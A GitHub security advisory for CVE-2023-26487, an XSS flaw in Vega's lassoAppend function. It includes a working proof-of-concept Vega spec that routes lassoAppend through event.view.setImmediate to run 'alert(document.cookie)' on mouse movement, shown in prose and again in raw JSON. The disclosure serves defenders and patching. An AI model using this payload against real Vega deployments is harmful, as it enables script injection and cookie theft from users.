ghsa-w5m3-xh75-mp55
Vulnerability from github
Published
2023-03-02 23:08
Modified
2023-03-13 15:30
Severity ?
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
Vega has Cross-site Scripting vulnerability in `lassoAppend` function
Details

Summary

Vega's lassoAppend function: lassoAppend accepts 3 arguments and internally invokes push function on the 1st argument specifying array consisting of 2nd and 3rd arguments as push call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.

This makes it possible to specify any object with a push function as the 1st argument, push function can be set to any function that can be access via event.view (no all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log).

Details

The issue is that lassoAppend doesn't enforce proper types of its arguments: ```js ..... export function lassoAppend(lasso, x, y, minDist = 5) { const last = lasso[lasso.length - 1];

// Add point to lasso if distance to last point exceed minDist or its the first point
if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
    lasso.push([x, y]);

..... ```

PoC

Use the following Vega snippet (depends on browser's non-built-in event.view.setImmediate function, feel free to replace with event.view.console.log or alike and observe the result in the browser's console)

json { "$schema": "https://vega.github.io/schema/vega/v5.json", "width": 350, "height": 350, "autosize": "none", "description": "Toggle Button", "signals": [ { "name": "toggle", "value": false, "on": [ { "events": {"type": "click", "markname": "circle"}, "update": "toggle ? false : true" } ] }, { "name": "addFilter", "on": [ { "events": {"type": "mousemove", "source": "window"}, "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')" } ] } ], "marks": [ { "name": "circle", "type": "symbol", "zindex": 1, "encode": { "enter": { "y": {"signal": "height/2"}, "angle": {"value": 0}, "size": {"value": 400}, "shape": {"value": "circle"}, "fill": {"value": "white"}, "stroke": {"value": "white"}, "strokeWidth": {"value": 2}, "cursor": {"value": "pointer"}, "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"} }, "update": {"x": {"signal": "toggle === true ? 190 : 165"}} } }, { "name": "rectangle", "type": "rect", "zindex": 0, "encode": { "enter": { "x": {"value": 152}, "y": {"value": 162.5}, "width": {"value": 50}, "height": {"value": 25}, "cornerRadius": {"value": 20} }, "update": { "fill": {"signal": "toggle === true ? '#006BB4' : '#939597'"} } } } ] }

Impact

This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate polyfill basically allows eval-like functionality).

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vega"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.23.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "vega-functions"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.13.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26487"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-02T23:08:21Z",
    "nvd_published_at": "2023-03-04T00:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nVega\u0027s `lassoAppend` function: `lassoAppend` accepts 3 arguments and internally invokes `push` function on the 1st argument specifying array consisting of 2nd and 3rd arguments as `push` call argument. The type of the 1st argument is supposed to be an array, but it\u0027s not enforced.\n\nThis makes it possible to specify any object with a `push` function as the 1st argument, `push` function can be set to any function that can be access via `event.view` (no all such functions can be exploited due to invalid context or signature, but some can, e.g. `console.log`).\n\n### Details\nThe issue is that [`lassoAppend`](https://github.com/vega/vega/blob/7eafbbd4d53d0ce9f08e74ff96c90d411b1bb80a/packages/vega-functions/src/functions/lasso.js#L13) doesn\u0027t enforce proper types of its arguments:\n```js\n.....\nexport function lassoAppend(lasso, x, y, minDist = 5) {\n    const last = lasso[lasso.length - 1];\n\n    // Add point to lasso if distance to last point exceed minDist or its the first point\n    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) \u003e minDist) {\n        lasso.push([x, y]);\n.....\n```\n\n### PoC\n\nUse the following Vega snippet (depends on browser\u0027s non-built-in `event.view.setImmediate` function, feel free to replace with `event.view.console.log` or alike and observe the result in the browser\u0027s console)\n\n```json\n{\n  \"$schema\": \"https://vega.github.io/schema/vega/v5.json\",\n  \"width\": 350,\n  \"height\": 350,\n  \"autosize\": \"none\",\n  \"description\": \"Toggle Button\",\n  \"signals\": [\n    {\n      \"name\": \"toggle\",\n      \"value\": false,\n      \"on\": [\n        {\n          \"events\": {\"type\": \"click\", \"markname\": \"circle\"},\n          \"update\": \"toggle ? false : true\"\n        }\n      ]\n    },\n    {\n      \"name\": \"addFilter\",\n      \"on\": [\n        {\n          \"events\": {\"type\": \"mousemove\", \"source\": \"window\"},\n          \"update\": \"lassoAppend({\u0027push\u0027:event.view.setImmediate},\u0027alert(document.domain)\u0027,\u0027alert(document.cookie)\u0027)\"\n        }\n      ]\n    }\n  ],\n  \"marks\": [\n    {\n      \"name\": \"circle\",\n      \"type\": \"symbol\",\n      \"zindex\": 1,\n      \"encode\": {\n        \"enter\": {\n          \"y\": {\"signal\": \"height/2\"},\n          \"angle\": {\"value\": 0},\n          \"size\": {\"value\": 400},\n          \"shape\": {\"value\": \"circle\"},\n          \"fill\": {\"value\": \"white\"},\n          \"stroke\": {\"value\": \"white\"},\n          \"strokeWidth\": {\"value\": 2},\n          \"cursor\": {\"value\": \"pointer\"},\n          \"tooltip\": {\"signal\": \"{Tip: \u0027Click to fire XSS\u0027}\"}\n        },\n        \"update\": {\"x\": {\"signal\": \"toggle === true ? 190 : 165\"}}\n      }\n    },\n    {\n      \"name\": \"rectangle\",\n      \"type\": \"rect\",\n      \"zindex\": 0,\n      \"encode\": {\n        \"enter\": {\n          \"x\": {\"value\": 152},\n          \"y\": {\"value\": 162.5},\n          \"width\": {\"value\": 50},\n          \"height\": {\"value\": 25},\n          \"cornerRadius\": {\"value\": 20}\n        },\n        \"update\": {\n          \"fill\": {\"signal\": \"toggle === true ? \u0027#006BB4\u0027 : \u0027#939597\u0027\"}\n        }\n      }\n    }\n  ]\n}\n```\n\n### Impact\nThis issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS `setImmediate` polyfill basically allows `eval`-like functionality).\n",
  "id": "GHSA-w5m3-xh75-mp55",
  "modified": "2023-03-13T15:30:47Z",
  "published": "2023-03-02T23:08:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vega/vega/security/advisories/GHSA-w5m3-xh75-mp55"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26487"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vega/vega/commit/01adb034f24727d3bb321bbbb6696a7f4cd91689"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vega/vega"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vega/vega/releases/tag/v5.23.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vega has Cross-site Scripting vulnerability in `lassoAppend` function"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.